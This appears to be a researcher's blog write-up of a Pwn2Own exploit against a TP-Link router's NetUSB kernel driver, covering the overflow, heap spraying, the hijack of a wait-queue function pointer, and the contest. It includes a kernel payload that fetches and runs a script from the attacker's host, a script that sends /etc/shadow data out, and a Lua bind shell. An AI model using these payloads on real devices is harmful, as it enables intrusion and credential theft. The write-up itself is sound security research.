I started to read a lot of code, documentation and papers about Linux kernel exploitation. The Linux kernel version was old enough that it didn't have a bunch of the more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets, Andrey Konovalov describes in detail an attack that looked like it could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel, and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes), which would force blocks from the higher orders to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000, which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could now be used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.
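
To make the buddy intuition concrete, here is a toy model of binary buddy splitting (purely illustrative, not the kernel's implementation): once the order 0 freelist is drained, allocating a page forces an order 1 block to be split into two adjacent 0x1000-byte pages, which is exactly the adjacency the strategy above relies on.

# Toy binary buddy model: freelists map order -> free block addresses,
# where an order-n block spans 2**n pages of 0x1000 bytes.
PAGE = 0x1000

def alloc(freelists, order):
    for o in range(order, max(freelists) + 1):
        if freelists.get(o):
            block = freelists[o].pop(0)
            while o > order:
                o -= 1
                # split: keep the lower half, put the upper buddy back
                freelists.setdefault(o, []).append(block + (PAGE << o))
            return block
    raise MemoryError('out of pages')

freelists = {0: [], 1: [0x86964000]}   # order 0 drained, one order 1 block left
a = alloc(freelists, 0)                # 0x86964000
b = alloc(freelists, 0)                # 0x86965000, adjacent to a
print(hex(a), hex(b), b - a == PAGE)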

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  switch (OpcodeMasked) {
    case 0x50:
        if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
          ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);
            AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
            if (!AllocatedBuffer) {
                return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
            }
  // ...
            if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to place there from over the network. After a bunch of trial and error, I started to notice that if I took a small pause after the allocation of the buffer but before overflowing it, an interesting structure would magically be allocated fairly close to my buffer. To this day, I haven't fully debugged where exactly it came from, but as this was my only lead, I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute code from the heap directly, which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB-large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation, as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d
addr_payload = 0x83c00000 + 0x10

# ...

def main(stdscr):
  # ...
  # Let's get to business.
  _3mb = 3 * 1_024 * 1_024
  payload_sprayer = SprayerThread(args.target, 'payload sprayer')
  payload_sprayer.set_length(_3mb)
  payload_sprayer.set_spray_content(payload)
  payload_sprayer.start()
  leaker.wait_for_one()
  sprayers.append(payload_sprayer)
  log(f'Payload placed @ {hex(addr_payload)}')
  y += 1

My final exploit, Zenith, overflows the head.next field of an adjacent wait_queue_head_t structure placed by the socket stack of the Linux kernel, overwriting it with the address of a crafted wait_queue_entry_t under my control (the Trasher class in the exploit code). These are the definitions of the two structures:

struct wait_queue_head {
  spinlock_t    lock;
  struct list_head  head;
};

struct wait_queue_entry {
  unsigned int    flags;
  void      *private;
  wait_queue_func_t func;
  struct list_head  entry;
};

This structure has a function pointer, func, that I use to hijack the execution flow and redirect it to a fixed location in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
      int nr_exclusive, int wake_flags, void *key)
{
  wait_queue_t *curr, *next;

  list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
    unsigned flags = curr->flags;

    if (curr->func(curr, mode, wake_flags, key) &&
        (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
      break;
  }
}
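
To make the corruption target a bit more tangible, here is a sketch in C (assumptions: 32-bit pointers as on this MIPS target and the field order from the structure definitions above; the real exploit packs these bytes from Python) of the fake wait_queue_entry_t the corrupted list traversal lands on. The only field that really matters for hijacking the flow is func, which __wake_up_common ends up calling:

#include <stdint.h>

/* Rough sketch, not the exploit's actual code: a fake wait_queue_entry laid
 * out like the kernel structure shown above, with func pointing at the
 * staged kernel payload. */
struct fake_wait_queue_entry {
    uint32_t flags;     /* 0: WQ_FLAG_EXCLUSIVE not set                */
    uint32_t private_;  /* 'private' in the kernel struct; unused here */
    uint32_t func;      /* hijacked function pointer -> staged payload */
    uint32_t next;      /* entry.next / entry.prev: placeholder values */
    uint32_t prev;
};

static const struct fake_wait_queue_entry fake_entry = {
    .flags    = 0,
    .private_ = 0,
    .func     = 0x83c00010,  /* addr_payload from the exploit snippet above */
    .next     = 0,
    .prev     = 0,
};

One subtlety: in the kernel, head.next points at an embedded list_head (the entry field), and list_for_each_entry_safe recovers the enclosing structure with container_of, so the address written by the overflow has to account for that offset before curr->func(curr, mode, wake_flags, key) hands control to the payload.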

This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00

(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff

(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.

(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
    prev = 0xbaadc0d1}}

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
    nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
    dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34

Once the func pointer is invoked, I get control of the execution flow and execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to run user-mode commands as root. It pulls a shell script off an HTTP server listening on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0
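
For reference, here is approximately what that payload boils down to, written against the older in-kernel C API rather than the hand-rolled MIPS assembly the exploit actually stages. Treat it as a sketch: the call_usermodehelper_setup prototype shown is the pre-3.9 one and differs on newer kernels, and ATTACKER_IP stands in for the {ip_local} template above.

#include <linux/gfp.h>
#include <linux/kmod.h>

/* ATTACKER_IP is a placeholder for the exploit's {ip_local} template. */
static char *argv[] = {
    "/bin/sh", "-c",
    "wget http://ATTACKER_IP:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh",
    NULL
};
static char *envp[] = { NULL };

static void run_pwn_sh(void)
{
    struct subprocess_info *info;

    /* Older ~3.x prototype: (path, argv, envp, gfp_mask). */
    info = call_usermodehelper_setup(argv[0], argv, envp, GFP_ATOMIC);
    if (info)
        /* Fire and forget: we are running in softirq context (see the
         * backtrace above), so we must not block here. */
        call_usermodehelper_exec(info, UMH_NO_WAIT);
}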

The pwn.sh shell script simply leaks the admin user's shadow hash and opens a bind shell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua one-liner) that the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

The exploit also uses the debug interface I mentioned earlier, as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf. the Leaker class).

OK, at that point it works in QEMU... which is pretty wild. I never thought it would. Ever. What's also wild is that I was still in time for the Pwn2Own registration, so maybe this was actually possible 🤔. Reliability-wise, it worked well enough in the QEMU environment: about 3 times out of 5, I would say. Good enough.

I started to port the exploit over to the real device and, to my surprise, it worked there as well. The reliability was poorer, but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel, I was left with dmesg output to try to make things better: tweak the spray here and there, try to go faster or slower, looking for a magic combination. In the end, I didn't find anything magic; the exploit was unreliable, but hey, I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide their exploits and documentation prior to the contest. Fully remote meant that the ZDI staff would run our exploits against the environment they had set up.

At that point we had two exploits, and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link had pushed an update for the router 😳. I thought: Damn. I was at work when I saw the news and was stressed about the bug getting killed, or about the update changing anything my exploit relied on: the kernel, etc. I finished my day at work and pulled the firmware from the website. I checked the release notes while the archive was downloading, but they didn't contain any hints suggesting that either NetUSB or the kernel had been updated, which was... good. I extracted the files from the firmware image with binwalk and quickly checked the NetUSB.ko file. I grabbed a hash and... it was the same. Wow. What a relief 😮‍💨.

When the time came to demonstrate my exploit, it unfortunately didn't land in any of the three attempts, which was a bit frustrating. Still, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think I'd be able to compete, so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my to-do list for the longest time, so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

  • Attacking the kernel might be cool, but it is an absolute pain to debug and to set up an environment for. I probably would not go that route if I were doing it again.
  • Vendors patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update, which was annoying. Fortunately, they were able to find another vulnerability, and that one stayed alive.
  • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post-auth vulnerability statically to get a root shell, but that was wasted time.
  • Ghidra's decompiler handles MIPS32 code pretty well. It wasn't perfect, but it was a net positive.
  • I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money, but it would probably be good for me to do a better job of looking at more than one target instead of diving deep into a single one right away.
  • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
  • Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith GitHub repository. If you want to read more about NetUSB, here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hang out on Diary of reverse-engineering's Discord server with us!
